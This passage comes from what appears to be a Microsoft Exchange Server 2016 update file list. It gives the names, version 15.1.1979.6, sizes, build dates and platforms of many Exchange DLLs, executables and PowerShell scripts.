x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.1979.6| 72,072| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.1979.6| 15,744| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.1979.6| 59,264| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.rpc.dll| 15.1.1979.6| 1,638,280| 12-Aug-2020| 20:47| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.1979.6| 207,232| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.1979.6| 60,288| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.1979.6| 517,504| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.1979.6| 161,160| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.1979.6| 721,800| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.1979.6| 234,880| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.1979.6| 20,872| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.1979.6| 35,200| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.1979.6| 42,368| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.1979.6| 56,192| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.1979.6| 27,520| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.1979.6| 130,432| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.1979.6| 14,720| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.1979.6| 20,360| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.1979.6| 21,376| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.1979.6| 267,648| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.1979.6| 110,984| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.1979.6| 112,520| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.1979.6| 622,472| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.1979.6| 162,184| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.1979.6| 12,152| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.1979.6| 19,336| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.core.dll| 15.1.1979.6| 209,800| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.1979.6| 96,640| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.1979.6| 16,760| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.1979.6| 435,072| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.files.dll| 15.1.1979.6| 274,312| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.1979.6| 24,968| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.1979.6| 219,008| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.search.service.exe| 15.1.1979.6| 26,496| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.1979.6| 162,176| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.security.dll| 15.1.1979.6| 1,554,816| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.1979.6| 19,840| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.1979.6| 28,552| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.1979.6| 222,592| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.1979.6| 1,110,904| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.1979.6| 212,352| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.1979.6| 113,544| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.1979.6| 82,824| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.1979.6| 80,776| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.1979.6| 66,432| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.1979.6| 81,280| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.1979.6| 208,256| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.1979.6| 1,163,136| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.1979.6| 504,200| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.1979.6| 47,488| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.1979.6| 848,256| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.1979.6| 1,219,976| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.1979.6| 30,600| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.1979.6| 120,712| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.1979.6| 1,009,544| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.1979.6| 110,976| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.1979.6| 34,696| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.1979.6| 19,336| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.1979.6| 14,712| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.1979.6| 60,800| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.1979.6| 50,560| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.1979.6| 14,208| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.1979.6| 14,216| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.services.common.dll| 15.1.1979.6| 74,112| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.services.dll| 15.1.1979.6| 8,490,880| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.1979.6| 30,088| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.1979.6| 633,728| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.1979.6| 1,651,080| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.services.json.dll| 15.1.1979.6| 296,328| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.1979.6| 43,392| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.1979.6| 233,344| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.1979.6| 178,568| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.1979.6| 348,544| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.1979.6| 56,712| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.1979.6| 94,592| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.1979.6| 297,344| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.1979.6| 35,712| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.1979.6| 27,008| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.1979.6| 115,072| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.1979.6| 54,144| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.1979.6| 75,144| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.1979.6| 142,720| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.1979.6| 24,960| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.1979.6| 58,760| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.1979.6| 27,016| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.1979.6| 46,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.sqm.dll| 15.1.1979.6| 46,976| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.store.service.exe| 15.1.1979.6| 28,040| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.1979.6| 26,496| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.1979.6| 13,704| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.1979.6| 31,616| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.1979.6| 1,166,712| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.1979.6| 158,600| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.1979.6| 628,096| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.1979.6| 13,192| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.1979.6| 16,264| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:46| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.1979.6| 221,568| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.1979.6| 13,696| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.1979.6| 29,056| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.1979.6| 138,624| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.1979.6| 21,888| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.1979.6| 40,312| 12-Aug-2020| 20:52| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.1979.6| 22,912| 12-Aug-2020| 20:52| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.1979.6| 21,384| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.1979.6| 212,360| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.1979.6| 98,688| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.1979.6| 22,920| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.1979.6| 169,344| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.1979.6| 18,304| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.1979.6| 20,864| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.1979.6| 31,624| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.1979.6| 46,976| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.1979.6| 30,080| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.1979.6| 53,128| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.1979.6| 44,936| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.1979.6| 46,464| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.1979.6| 46,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.1979.6| 28,040| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.1979.6| 457,088| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.1979.6| 18,304| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.1979.6| 30,592| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.dll| 15.1.1979.6| 4,181,888| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.1979.6| 182,144| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.1979.6| 121,728| 12-Aug-2020| 20:47| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.1979.6| 403,328| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.1979.6| 14,720| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.1979.6| 86,912| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.1979.6| 88,960| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.1979.6| 68,488| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.1979.6| 63,368| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.1979.6| 430,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.1979.6| 122,240| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.1979.6| 29,064| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.1979.6| 60,808| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.1979.6| 50,048| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.1979.6| 33,152| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.1979.6| 113,032| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.1979.6| 52,096| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.1979.6| 675,192| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.1979.6| 21,896| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.1979.6| 487,304| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.1979.6| 306,048| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.1979.6| 46,456| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.1979.6| 1,044,360| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.1979.6| 18,816| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.1979.6| 18,816| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.1979.6| 22,408| 12-Aug-2020| 20:52| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.1979.6| 60,288| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.1979.6| 211,848| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.1979.6| 120,704| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.1979.6| 214,920| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.1979.6| 118,656| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.1979.6| 239,488| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.1979.6| 925,560| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.1979.6| 1,468,800| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.1979.6| 32,648| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.1979.6| 41,856| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.1979.6| 24,960| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.1979.6| 130,440| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.1979.6| 83,328| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.1979.6| 50,048| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.1979.6| 642,432| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.1979.6| 186,248| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.1979.6| 67,464| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.1979.6| 12,680| 12-Aug-2020| 20:47| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.1979.6| 56,704| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.1979.6| 27,512| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.1979.6| 120,712| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.1979.6| 31,608| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.1979.6| 57,216| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.1979.6| 35,720| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.webservices.dll| 15.1.1979.6| 1,054,080| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.1979.6| 67,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.1979.6| 23,432| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.1979.6| 77,184| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.1979.6| 17,280| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.1979.6| 29,048| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.1979.6| 505,224| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.1979.6| 14,720| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.1979.6| 36,736| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.1979.6| 66,432| 12-Aug-2020| 20:47| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.1979.6| 19,328| 12-Aug-2020| 20:48| x86 \nMicrosoft.filtering.dll| 15.1.1979.6| 113,024| 12-Aug-2020| 20:51| x86 \nMicrosoft.filtering.exchange.dll| 15.1.1979.6| 57,224| 12-Aug-2020| 20:48| x86 \nMicrosoft.filtering.interop.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:47| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.1979.6| 46,976| 12-Aug-2020| 20:51| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:51| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.1979.6| 23,936| 12-Aug-2020| 20:48| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.1979.6| 22,408| 12-Aug-2020| 20:48| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.1979.6| 34,696| 12-Aug-2020| 20:48| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,902| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,278| 12-Aug-2020| 20:46| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.1979.6| 1,518,472| 12-Aug-2020| 20:47| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:47| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.1979.6| 33,160| 12-Aug-2020| 20:50| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:47| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.1979.6| 46,472| 12-Aug-2020| 20:49| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.1979.6| 50,560| 12-Aug-2020| 20:48| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.1979.6| 72,576| 12-Aug-2020| 20:48| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.1979.6| 533,896| 12-Aug-2020| 20:47| x86 \nMicrosoft.managementgui.dll| 15.1.1979.6| 133,512| 12-Aug-2020| 20:48| x86 \nMicrosoft.mce.interop.dll| 15.1.1979.6| 24,456| 12-Aug-2020| 20:48| x86 \nMicrosoft.office.audit.dll| 15.1.1979.6| 123,776| 12-Aug-2020| 20:47| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.1979.6| 593,272| 12-Aug-2020| 20:50| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.1979.6| 42,368| 12-Aug-2020| 20:47| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.1979.6| 217,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.office.compliance.console.dll| 15.1.1979.6| 854,912| 12-Aug-2020| 20:50| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.1979.6| 485,768| 12-Aug-2020| 20:50| x86 \nMicrosoft.office.compliance.core.dll| 15.1.1979.6| 413,056| 12-Aug-2020| 20:47| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.1979.6| 36,224| 12-Aug-2020| 20:48| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.1979.6| 84,856| 12-Aug-2020| 20:51| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.1979.6| 1,782,152| 12-Aug-2020| 20:49| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.1979.6| 49,544| 12-Aug-2020| 20:50| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.1979.6| 27,520| 12-Aug-2020| 20:48| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.1979.6| 174,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.1979.6| 166,272| 12-Aug-2020| 20:47| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.1979.6| 40,320| 12-Aug-2020| 20:47| x86 \nMicrosoft.online.box.shell.dll| 15.1.1979.6| 46,464| 12-Aug-2020| 20:47| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.1979.6| 67,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.1979.6| 67,976| 12-Aug-2020| 20:47| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.1979.6| 120,200| 12-Aug-2020| 20:47| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,110| 12-Aug-2020| 20:51| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,052| 12-Aug-2020| 20:49| Not applicable \nMovemailbox.ps1| Not applicable| 61,116| 12-Aug-2020| 20:49| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,590| 12-Aug-2020| 20:49| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,520| 12-Aug-2020| 20:49| Not applicable \nMpgearparser.dll| 15.1.1979.6| 99,720| 12-Aug-2020| 20:48| x64 \nMsclassificationadapter.dll| 15.1.1979.6| 248,704| 12-Aug-2020| 20:48| x64 \nMsexchangecompliance.exe| 15.1.1979.6| 78,728| 12-Aug-2020| 20:47| x86 \nMsexchangedagmgmt.exe| 15.1.1979.6| 25,472| 12-Aug-2020| 20:51| x86 \nMsexchangedelivery.exe| 15.1.1979.6| 38,784| 12-Aug-2020| 20:51| x86 \nMsexchangefrontendtransport.exe| 15.1.1979.6| 31,624| 12-Aug-2020| 20:48| x86 \nMsexchangehmhost.exe| 15.1.1979.6| 27,008| 12-Aug-2020| 20:50| x86 \nMsexchangehmrecovery.exe| 15.1.1979.6| 29,568| 12-Aug-2020| 20:49| x86 \nMsexchangemailboxassistants.exe| 15.1.1979.6| 72,576| 12-Aug-2020| 20:48| x86 \nMsexchangemailboxreplication.exe| 15.1.1979.6| 20,864| 12-Aug-2020| 20:51| x86 \nMsexchangemigrationworkflow.exe| 15.1.1979.6| 68,992| 12-Aug-2020| 20:51| x86 \nMsexchangerepl.exe| 15.1.1979.6| 71,048| 12-Aug-2020| 20:49| x86 \nMsexchangesubmission.exe| 15.1.1979.6| 123,264| 12-Aug-2020| 20:49| x86 \nMsexchangethrottling.exe| 15.1.1979.6| 39,816| 12-Aug-2020| 20:48| x86 \nMsexchangetransport.exe| 15.1.1979.6| 74,104| 12-Aug-2020| 20:48| x86 \nMsexchangetransportlogsearch.exe| 15.1.1979.6| 139,144| 12-Aug-2020| 20:48| x86 \nMsexchangewatchdog.exe| 15.1.1979.6| 55,672| 12-Aug-2020| 20:49| x64 \nMspatchlinterop.dll| 15.1.1979.6| 53,640| 12-Aug-2020| 20:49| x64 \nNativehttpproxy.dll| 15.1.1979.6| 91,528| 12-Aug-2020| 20:51| x64 \nNavigatorparser.dll| 15.1.1979.6| 636,808| 12-Aug-2020| 20:48| x64 \nNego2nativeinterface.dll| 15.1.1979.6| 19,328| 12-Aug-2020| 20:49| x64 \nNegotiateclientcertificatemodule.dll| 